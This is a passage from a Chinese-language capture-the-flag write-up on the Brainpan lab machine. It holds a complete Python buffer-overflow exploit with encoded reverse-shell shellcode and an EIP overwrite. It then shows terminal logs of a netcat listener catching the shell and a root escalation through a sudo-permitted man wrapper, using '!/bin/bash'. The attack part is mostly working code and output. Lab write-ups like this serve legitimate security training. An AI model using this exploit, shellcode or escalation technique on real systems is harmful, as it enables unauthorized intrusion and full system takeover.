27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import sys,socket
 
victim = '192.168.56.115'
port = 9999
 
junk = "\x41" * 524
eip = "\xf3\x12\x17\x31"
buf =  b"\x90" * 13
buf += b"\x89\xe5\xd9\xcb\xd9\x75\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
buf += b"\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
buf += b"\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
buf += b"\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
buf += b"\x4a\x49\x30\x31\x49\x4b\x5a\x57\x4b\x53\x31\x43\x47"
buf += b"\x33\x46\x33\x53\x5a\x53\x32\x4b\x39\x4b\x51\x38\x30"
buf += b"\x52\x46\x58\x4d\x4d\x50\x4a\x33\x36\x39\x48\x30\x37"
buf += b"\x4f\x58\x4d\x4d\x50\x30\x49\x44\x39\x5a\x59\x35\x38"
buf += b"\x49\x50\x59\x38\x30\x38\x45\x36\x32\x48\x44\x42\x33"
buf += b"\x30\x35\x51\x4f\x4b\x4b\x39\x4b\x51\x38\x30\x42\x46"
buf += b"\x56\x30\x36\x31\x30\x53\x4f\x43\x33\x33\x4c\x49\x4b"
buf += b"\x51\x38\x4d\x4d\x50\x50\x52\x43\x58\x52\x4e\x46\x4f"
buf += b"\x44\x33\x52\x48\x53\x58\x36\x4f\x46\x4f\x32\x42\x53"
buf += b"\x59\x4d\x59\x4a\x43\x31\x42\x31\x43\x4c\x49\x4d\x31"
buf += b"\x38\x30\x34\x4b\x58\x4d\x4b\x30\x41\x41"
 
payload = junk + eip + buf
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  print "[-] Connecting to " + str(victim)
  s.connect((victim, port))
  s.recv(1024)
 
  # Send payload 
  print "[-] Sending payload.... ",
  s.send(payload)
  print "Done"
 
except:
  print "[-] Unable to connect to " + str(victim)
  sys.exit(0)

使用受害者主机的IP地址和更新的Shellcode更新PoC脚本,在端口443上创建一个新的netcat侦听器,并相应地执行,成功的返回了shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.56.115: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.115] 39737
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
python -c 'import pty; pty.spawn("/bin/bash")'
puck@brainpan:/home/puck$ id
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
puck@brainpan:/home/puck$ whoami
whoami
puck
puck@brainpan:/home/puck$ ls
ls
checksrv.sh  web
puck@brainpan:/home/puck$

提权

成功!现在,受害者计算机上有一个特权低的shell。继续。查看主目录,看是否有有趣的事情……。不。唯一值得注意的是,有一个脚本可以在死时重新启动Web服务,以及在端口10000上运行的Web服务的根目录。sudo可以使用任何特殊权限吗?

1
2
3
4
5
6
7
8
puck@brainpan:/home$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util

anansi_util NOPASSWD?很有趣。仔细看看。

1
2
3
4
5
6
7
puck@brainpan:/home$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
  • manual [command]部分。看看是否可以使用root特权运行[command]。

成功的提权并找到了flag,吊炸天!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
puck@brainpan:/home$ sudo /home/anansi/bin/anansi_util manual /bin/bash
sudo /home/anansi/bin/anansi_util manual /bin/bash
/usr/bin/man: manual-/bin/bash: No such file or directory
/usr/bin/man: manual_/bin/bash: No such file or directory
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
BASH(1)                                                                BASH(1)

NAME
       bash - GNU Bourne-Again SHell

SYNOPSIS
       bash [options] [file]

COPYRIGHT
       Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.

DESCRIPTION
       Bash  is  an  sh-compatible  command language interpreter that executes
       commands read from the standard input or from a file.  Bash also incor‐
       porates useful features from the Korn and C shells (ksh and csh).

       Bash  is  intended  to  be a conformant implementation of the Shell and
       Utilities portion  of  the  IEEE  POSIX  specification  (IEEE  Standard
       1003.1).  Bash can be configured to be POSIX-conformant by default.

OPTIONS
       All  of  the  single-character shell options documented in the descrip‐
       tion of the set builtin command can be used as options when  the  shell
 Manual page bash(1) line 1 (press h for help or q to quit)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man# cd /root
cd /root
root@brainpan:~# ls
ls
b.txt
root@brainpan:~# cat b.txt
cat b.txt
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|


                                              http://www.techorganic.com 



root@brainpan:~#

W00T !!!!!root!二进制文件允许以root用户身份查询联机帮助页,因此,可以使用man的内置功能来内联运行命令,例如上述输出中的!/bin/bash。

知识点总结

  • 缓冲区溢出
  • od调试程序
  • python模糊测试脚本测试段错误
  • msf脚本生成填充缓冲区的字节
  • msfvenom生成reverse shell的python shellcode版本的代码
  • 覆盖eip将恶意shellcode代码放入esp取得reverseshell
  • man内置功能内联运行命令提权

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…